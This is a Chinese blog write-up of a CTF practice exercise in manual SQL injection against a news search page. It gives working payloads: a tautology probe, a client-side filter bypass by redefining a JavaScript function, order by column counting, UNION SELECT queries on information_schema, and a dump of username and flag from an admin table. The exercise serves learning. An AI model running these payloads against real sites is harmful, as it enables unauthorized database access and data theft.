记一次sql注入练习

做这个练习之前,感觉自己就是个小白,做了之后,感觉学到了好多东西。作文以记之。

题目要求

题目源于一个比赛,要求找出数据库中的flag字段的值。
给的题目环境是一个新闻搜索引擎。

界面
界面

开始渗透

哈集美马修~

1.sql注入检测,试探该网站有没有sql注入漏洞。

首先猜测sql执行语句为:
select [字段1,字段2...字段n] from [表名] where [内容字段] like '%关键词%' [...]
中括号[]标识的都是未知内容。
所谓检测就是在where后面的条件上做文章,改变其逻辑,让其恒为真。

尝试在关键词中写1' or '1'='1'#(其中#为mysql的单行注释符,旨在去掉sql语句后面的逻辑,不同的数据库实现可能有些许不同)
试图将sql语句改变为:
select [字段] from [表名] where [内容字段] like '%1' or '1'='1'#%' [...]
#符号后面的语句被注释掉了,并且where条件因为被加上 or '1'='1'所以恒为真。
所以该sql等价于:select 字段 from 表

此时点击搜索按钮,只要有内容被查出,说明该网站是有sql注入漏洞的。

2.越过页面js脚本。

然而,在我点击了搜索按钮之后,得到的只是一个警告框。

警告框

不急,这虽然证明该网站做了针对sql注入的防备,但不能说明防备是有效的。
反而对于我来说这是一件可庆幸的事,说明该网站很有可能采用的是拼接sql的方式,为了防止sql注入而做了敏感字符过滤。

现在找到弹框的js代码才是最重要的。
右键页面,打开网页源代码。喜从中来。

网页中的js脚本
搜索按钮

逻辑似乎已经看出来了,点击搜索后,获取关键词内容,对关键词内容进行敏感字符过滤。

这个过滤是在前端进行的,所以形同虚设。虽然这个是一开始就加载了的代码,修改它不会起作用,但是可以采用地址栏执行js的方式,对这个函数进行重写。
清空地址栏,输入javascript:前缀,给一个空格之后就可以写要执行的js代码了,直接定义一个名称为myFunction的函数,这个函数什么都不做,回车。

重写js函数

然后再次进行sql注入探测。

搜索结果

果了个然的查出了新闻记录。
证明此网站确是存在sql注入漏洞的。

3.探测select字段个数

我的目的很明确,找到数据库中的flag字段,这个字段可能是在这个新闻表里面,也可能在别的表里面。这些之后慢慢爆。
现在有个问题,怎样才知道想要的信息,也就是说,怎样才能让它把我想要的信息打印在页面上。
通过firebug知晓了,点击搜索后并不是发送的异步请求,所以页面上的输出是在后端就已经搞定了的。

神器一:union关键字
union关键字,这个关键字可以将两个查询结果以一个结果集返回。这简直是神器。不过需要知道他的select语句里面查询了多少个字段,因为union连接的两个查询结果列数必需相等。

神器二:order by关键字
这就要用到另一个神器 order by。因为order by后面可以接数字,表示结果按select的第几个字段进行排序。

猜测一下,因为页面上显示的每个新闻信息有3个字段,所以很有可能,select语句所查询的就是这3个字段。不过为了严谨,还是用order by来验证一下。

关键词输入框输入:1' or '1'='1' order by 3#
等价sql语句:select [字段] from [表名] order by 3

查询结果

有数据,说明字段数>=3

关键词输入框输入:1' or '1'='1' order by 4#
等价sql语句:select [字段] from [表名] order by 4

查询结果

无数据,此时后台sql一定是报错了,说明字段数<4
综上,3<=字段数<4,得出字段数=3。

4.在页面上输出自己想要输出的内容。

用order by知道了字段数,就可以动用union神器了。
用union时除了知道字段数,还需要知道字段类型,但是这个很简单,观察列表列出的值就大概清楚。

关键词输入框输入:1' and 1=2 union select 20,'JerryL','hahaha'#
等价sql语句:select 20,'JerryL','hahaha'(由于where恒为假,所以前面的查询一定没有结果,结果只可能是后面的查询)

查询结果

结果没问题。

5.找表,找字段

现在已经能够自由的操作页面的显示了,只需要找到flag所在的表,就可以完成任务。

列出当前数据库所有表
其实mysql把所有的表、视图、函数等信息都放到了information_schema这个数据库中,而所有表的信息在information_schema.TABLES这个表中。这就表示,只要知道了数据库类型是mysql,就可以用这个表来查询所有数据库,所有表的信息。

还需要用到一个函数database(),这个函数返回当前web程序使用的数据库的名称。
于是..

关键词输入框输入:1' and 1=2 union select 20,'JerryL',TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database()#
等价sql语句:select 20,'JerryL',TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database()

当前数据库所有表

可以看到这个数据库里面有两张表,一张admin,一张news。不过我们需要的是表名和字段名,所以只有表名是不够的。

列出指定表中所有字段名
有困难,找information_schema。
在information_schema库里面的COLUMNS表中,有所有的字段信息。
关键词输入框输入:1' and 1=2 union select 20,TABLE_NAME,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=database()#
等价sql语句:select 20,TABLE_NAME,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=database()#

查询结果

真相大白。

6.执行最后任务,拿出flag

关键词输入框输入:1' and 1=2 union select 20,username,flag from admin#
等价sql语句:select 20,username,flag from admin

得到flag

技巧总结

1.sql注入探测,尝试通过参数修改sql where语句的逻辑,使其恒为真,执行后看逻辑是否被修改成功,从而判定是否有注入点。

2.页面上的js几乎都是形同虚设的,总有办法让其失效,常用的就是浏览器地址栏输入:javascript: js代码。用js代码的执行来为一些变量赋值,或者重写函数。

3.用order by探测字段个数,知道个数后,用union输出自己想要的内容。

4.各大数据库实现都提供了许多可用的函数和元数据表等,这些都是很有用的工具。

关于sql预编译

个人理解,sql预编译不能完全解决sql注入的问题,他的作用仅仅是将敏感字符的处理从后端代码交给了数据库软件。
也就是说,如果使用的数据库软件本身的实现是有漏洞的,那么照样可以进行sql注入。不过主流的数据库软件应该都是可靠的,所以程序中尽量采用sql预编译。

后记

第一次正儿八经地搞sql注入,虽然只是一道练习题。但是对于一个没有用工具,采用手工注入,而且之前没有sql注入经验的人来说,过程还是有点困难的。不过当凭着自己的想法,一步一步往真相靠近的时候,感觉真的很棒。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 215,794评论 6 498
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 92,050评论 3 391
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 161,587评论 0 351
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 57,861评论 1 290
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 66,901评论 6 388
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,898评论 1 295
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,832评论 3 416
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,617评论 0 271
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 45,077评论 1 308
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,349评论 2 331
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,483评论 1 345
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,199评论 5 341
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,824评论 3 325
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,442评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,632评论 1 268
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,474评论 2 368
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,393评论 2 352

推荐阅读更多精彩内容